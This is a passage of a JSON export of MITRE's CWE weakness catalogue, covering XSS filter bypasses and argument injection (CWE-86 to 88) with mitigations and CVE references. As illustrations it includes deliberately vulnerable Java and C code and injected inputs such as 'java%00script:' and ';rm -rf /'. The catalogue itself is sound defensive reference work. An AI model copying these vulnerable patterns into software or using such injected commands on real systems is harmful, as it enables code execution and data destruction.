Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"86":{"attr":{"@_ID":"86","@_Name":"Improper Neutralization of Invalid Characters in Identifiers in Web Pages","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.","Extended_Description":"Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the software may attempt to remove a \\"javascript:\\" URI scheme, but a \\"java%00script:\\" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. Multiple Interpretation Error (MIE) and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Invalid Characters in Identifiers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"247"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Invalid Characters in Identifiers","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Invalid Characters in Identifiers in Web Pages","attr":{"@_Date":"2010-04-05"}}]}},"87":{"attr":{"@_ID":"87","@_Name":"Improper Neutralization of Alternate XSS Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0738","Description":"XSS using \\"&amp;={script}\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0738"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate XSS syntax"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"199"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Alternate XSS Syntax","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Alternate XSS Syntax","attr":{"@_Date":"2010-06-21"}}]}},"88":{"attr":{"@_ID":"88","@_Name":"Improper Neutralization of Argument Delimiters in a Command (\'Argument Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs a string for a command to executed by a separate component\\nin another control sphere, but it does not properly delimit the\\nintended arguments, options, or switches within that command string.","Extended_Description":{"xhtml:p":"When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed.  This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters.  When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer.  The attacker may then be able to change the behavior of the command.  Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Read Application Data","Modify Application Data"],"Note":"An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Parameterization","Description":"Where possible, avoid building a single string that contains the command and its arguments.  Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command.  For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments.  In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter.","Effectiveness":"High"},{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0113","Description":"Canonical Example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113"},{"Reference":"CVE-2001-0150","Description":"Web browser executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0150"},{"Reference":"CVE-2001-0667","Description":"Web browser allows remote attackers to execute commands by spawning Telnet with a log file option on the command line and writing arbitrary code into an executable file which is later executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0667"},{"Reference":"CVE-2002-0985","Description":"Argument injection vulnerability in the mail function for PHP may allow attackers to bypass safe mode restrictions and modify command line arguments to the MTA (e.g. sendmail) possibly executing commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0985"},{"Reference":"CVE-2003-0907","Description":"Help and Support center in windows does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an \\"hcp://\\" URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907"},{"Reference":"CVE-2004-0121","Description":"Mail client does not sufficiently filter parameters of mailto: URLs when using them as arguments to mail executable, which allows remote attackers to execute arbitrary programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121"},{"Reference":"CVE-2004-0473","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0473"},{"Reference":"CVE-2004-0480","Description":"Mail client allows remote attackers to execute arbitrary code via a URI that uses a UNC network share pathname to provide an alternate configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480"},{"Reference":"CVE-2004-0489","Description":"SSH URI handler for web browser allows remote attackers to execute arbitrary code or conduct port forwarding via the a command line option.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0489"},{"Reference":"CVE-2004-0411","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411"},{"Reference":"CVE-2005-4699","Description":"Argument injection vulnerability in TellMe 1.2 and earlier allows remote attackers to modify command line arguments for the Whois program and obtain sensitive information via \\"--\\" style options in the q_Host parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4699"},{"Reference":"CVE-2006-1865","Description":"Beagle before 0.2.5 can produce certain insecure command lines to launch external helper applications while indexing, which allows attackers to execute arbitrary commands. NOTE: it is not immediately clear whether this issue involves argument injection, shell metacharacters, or other issues.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1865"},{"Reference":"CVE-2006-2056","Description":"Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2056"},{"Reference":"CVE-2006-2057","Description":"Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2057"},{"Reference":"CVE-2006-2058","Description":"Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2058"},{"Reference":"CVE-2006-2312","Description":"Argument injection vulnerability in the URI handler in Skype 2.0.*.104 and 2.5.*.0 through 2.5.*.78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2312"},{"Reference":"CVE-2006-3015","Description":"Argument injection vulnerability in WinSCP 3.8.1 build 328 allows remote attackers to upload or download arbitrary files via encoded spaces and double-quote characters in a scp or sftp URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3015"},{"Reference":"CVE-2006-4692","Description":"Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a \\"/\\" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka \\"Object Packager Dialogue Spoofing Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4692"},{"Reference":"CVE-2006-6597","Description":"Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6597"},{"Reference":"CVE-2007-0882","Description":"Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client \\"-f\\" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2019-13475","Description":"Argument injection allows execution of arbitrary commands by injecting a \\"-exec\\" option, which is executed by the command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13475"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Argument Injection or Modification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":30,"Entry_Name":"Mail Command Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"137"}},{"attr":{"@_CAPEC_ID":"174"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"460"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-859"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;The Argument Array&#34;, Page 567"}},{"attr":{"@_External_Reference_ID":"REF-1030"}}]},"Notes":{"Note":{"#text":"At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Name, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Argument Injection or 